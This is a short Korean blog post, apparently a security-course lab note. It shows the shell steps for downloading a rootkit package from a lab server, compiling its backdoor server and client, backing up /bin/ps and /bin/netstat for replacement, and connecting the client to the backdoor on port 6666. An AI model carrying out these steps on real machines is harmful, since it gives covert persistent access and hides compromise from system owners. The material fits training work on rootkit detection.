서버
[root@localhost ~]# mkdir /root/white_rootkit
[root@localhost ~]# wget http://200.200.200.200:8080/webshare/white_rootkit/white_rootkit.zip
[root@localhost ~]# yum -y install gcc
[root@localhost ~]# make
gcc -o white_backc white_backc.c
gcc -o white_backs white_backs.c
gcc -o white_net white_net.c
gcc -o white_ps white_ps.c
백도어 실행
[root@localhost ~]# ./white_backs
명령어 백업 해놓을것(/bin/ps,/bin/netstat)!!
[root@localhost ~]# cp /bin/ps /root/ps.back
[root@localhost ~]# cp /bin/netstat /root/netstat.back
# mv /root/white_rootkit.zip /root/white_rootkit/
[root@localhost ~]# cd /root/white_rootkit/
[root@localhost white_rootkit]# ls
white_rootkit.zip
클라이언트
# yum -y install gcc wget
# wget http://200.200.200.200:8080/webshare/white_rootkit/white_backc.c
# vi /root/white_backc.c
7 #define PORT 6666 ==> 서버에서도 6666 번으로 백도어를 열어야 한다.
21 s_addr.sin_addr.s_addr = inet_addr("서버주소");
백도어 클라이언트 프로그램 생성
# gcc -o client white_backc.c
실행(백도어 서버 실행후 실행할것)
# ./client
'INFOSEC > LINUX' 카테고리의 다른 글
SNORT (0) | 2019.09.26 |
---|---|
Rootkit 감지 (0) | 2019.09.25 |
Local Backdoor (0) | 2019.09.24 |
Local Backdoor (0) | 2019.09.23 |
시스템 로그 분석 ( logrotate ) (0) | 2019.09.23 |